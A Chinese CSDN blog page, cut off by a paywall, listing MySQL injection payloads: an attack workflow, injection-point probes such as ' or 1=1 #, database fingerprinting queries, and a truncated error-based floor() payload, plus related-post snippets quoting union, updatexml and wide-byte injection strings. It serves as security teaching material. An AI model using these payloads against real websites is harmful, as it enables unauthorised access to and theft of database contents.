MySQL注入--Payload

最新推荐文章于 2022-06-21 16:14:57 发布
最新推荐文章于 2022-06-21 16:14:57 发布
阅读量1.1k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37595954/article/details/102749293
版权

MySQL注入--Payload

Mirror王宇阳

2019-10-22

SQL的注入流程一般如下:

1、判断是否有SQL注入漏洞(判断注入点)

2、判断 数据库的系统架构、数据库名、web应用类型等

3、获取数据库信息

4、加密信息破解

5、进行提权

前篇

注入漏洞分类:

数字型注入:

当输入(注入)的参数为整数,则可以认为该漏洞注入点为数字型注入;

http://192.168.2.172/index.php/?id=8

在后端中SQL语句构成如下:

select * from user where id=8;
字符型注入:

当输入(注入)的参数为字符/串时可以认定为是字符型注入漏洞

其它注入:

POST注入:注入字段在POST数据中

Cookie注入:注入字段在Cookie数据中

延迟注入:使用数据库延迟特性进行注入

搜索注入:在搜索栏中利用恶意代码进行注入

base64注入:注入字符串经过base64加密

判断注入点

' or 1=1 #

and 1=1 #
and '1'='1' #
1') and ('1=1') #
url/?id=1/1
url/?id=1/0

判断数据库系统类型

PHP搭建的Web应用后端为MySQL

JSP搭建的Web应用后端为Oracle

ASP搭建的Web应用后端为MSSQL

MySQL

字符串连接判断:

?id=1 and '1'+'1' = '11'
?id=1 and concat('1','1')='11'

判断数据库的系统库表:

' and (select count(*) from information_schema.tables)>0 and 1=1

MSSQL

默认变量:

'?; select @@servername--+

字符串连接判断:

?id=1 and '1'+'1'='11'

数据库系统表判断:

' and (select count(*) from sysobjects)>0 and 1=1

Oracle

系统表判断:

' and (select count(*) from sys.user_tables)>0 and 1=1

字符串连接判断:

and '1'||'1' = '11'
and concat('1','1')='11'

MySQL注入姿势payload

报错注入

语句执行后返回异常信息,这些异常信息包含了重要数据

floor报错注入:

floorgroup by配合使用group by的key唯一性和编码顺序导致二次执行产生不同大的key

' and select count(*) from table group by floor(rand(0))*2 #

union select 1,count(*),concat(0x7e,0x7e
最低0.47元/天 解锁文章
m0_37595954
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手工SQL注入payload
山兔的博客
03-17 301
and sleep(5)(判断页面返回时间)-1/+1 回显上下页(整形)单引号(字符型/整形)
SQL注入(没有原理,分类payload
weixin_46709219的博客
08-13 740
一)关于数据库的一些基本知识: MySQL5.0以下,没有information_schema这个系统表,无法列表名等,只能暴力跑表名。 MySQL5.0以上,MySQL中默认添加了一个名为 information_schema 的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。 mysql中注释符: 单行注释:#       多行注释:/**/ information_schema数据库中三个很重要的表: 1)in
SQL注入MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2085
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
mysql注入大全_mysql注入大全及防御
weixin_30119911的博客
01-19 448
0.明白存在的位置:get型 post型 cookie型 http头注入1.先测试注入点,注册框、搜索框、地址栏啥的,判断是字符型,搜索型还是数字型字符型 1' and '1'='1 成功,1' and '1'='2 报错 1成功,1'报错 注意闭合万能密码:1' or ’1‘=’1 #数字型去掉'同理搜索型 select password from users where user l...
mysql数据库之报错注入常用payload
Websec
02-20 1391
flloor报错注入 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);   ExtractValue报错注入 and extractvalue(1, concat(0x5c, (select table_na...
mysql注入-sqlilabs靶场注入
10-15
MySQL注入是一种常见的网络安全漏洞,主要发生在应用程序中,当用户输入的数据未经充分验证或过滤就直接用于构造SQL查询时。SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,...
web-报错注入-皮卡丘靶场
07-15
正确编码后的Payload应该能够通过URL传递并触发报错注入。 3. **HTTP头注入(Cookie报错注入)**: 攻击者可以通过设置特定的HTTP头(如Cookie)来实现报错注入。例如,设置`Cookie`为`admin' and updatexml(1,...
SQL_Injection_Payload:SQL注入有效负载列表
01-28
5. **错误回显**:如果应用程序错误信息揭示了太多信息,攻击者可以利用这些信息构建有效的注入payload。 6. **存储过程注入**:如果应用程序使用存储过程进行查询,攻击者可能能够注入代码来执行存储过程。 7. **...
第十九节 宽字节SQL注入-01
09-15
我们使用的payload是“id=%df'”,这个payload将被MYSQL认为是一个宽字符,从而使得攻击者可以inject恶意SQL代码。 Sqlmap安全检测 在Sqlmap安全检测中,我们使用了Sqlmap工具来检测宽字节SQL注入漏洞。我们使用的...
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
MySQL协议包说明
qq_28834355的博客
11-21 1249
Packet基本构成 Packet不能超过16M(224-1 byte,0xffffff),如果超过了会拆成多个Packet发送 Packet头部都必须携带Header信息 Packet拆解 Header信息由4个字节组成,前3字节代表mysql包长度(payload_length),第4字节表示包序号(sequence_id) 从第5个字节开始表示mysql包内容(payload),具体长度由payload_length决定 举个例子,Packet用字节数组表示:49 1 0 0 2 50 22
sql注入payload总结
recover517的博客
03-04 8699
个人经验加网上的wp总结的注入类型,附上sqlmap命令
mysql盲注总结
z7sz的博客
06-21 1122
本文的内容主要是对mysql盲注的总结
SQL注入payload(持续更新)
Zeker62的博客
08-31 2650
id='1' order by 3 --+ //%20是空格,%23是# id='2' and 1=2 union select 1,2,datbase()--+ //查数据库 id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表 id='4' and 1=2 union select 1,2,group_co
SQLMAP注入过程payload分析
热门推荐
Breeze的博客
03-31 2万+
众所周知,sqlmap是一款命令自动SQL注入工具,功能非常之多,几乎是用于所有场景,研究分析sqlmap的注入payload过程能使我们对SQL注入的理解更加深刻,也能在以后在一些手工测试的场合拥有更多的思路。 今天我们以一个实际的上海某企业的案例来分析一下sqlmap在基于布尔型盲注的时候的工作思路和注入payload的原理。 目标站点url:http://www.xxxxxxx.com....
MySQL注入及绕过备忘录
weixin_43610673的博客
04-25 5122
SQL注入(以Mysql为例) 大致分为有回显和无回显两类进行梳理,重心会放在盲注这一块,正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演示,在challenges数据库中在添加一个flag数据库表,并修改sql-labs源码使其回显执行的sql语句,方便演示。 判断是否存在SQL注入 本质都是看页面是否出现异常 加单引号’、双引号”、单括号)、双括号))或者进行组合看看是否报错(字符型)。 服务器不返回报错信息时,加 and 1=1 、 and 1=2 看页面是否有变化(数字型),字符型
mysql payload
最新发布
10-01
MySQL payload是指在使用MySQL数据库时,通过特定的语句或代码来执行一系列恶意操作的数据。它可以被用来进行各种攻击,例如注入攻击、拒绝服务攻击等。如引用中所示,可以通过构建恶意的SQL语句来实现注入攻击。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值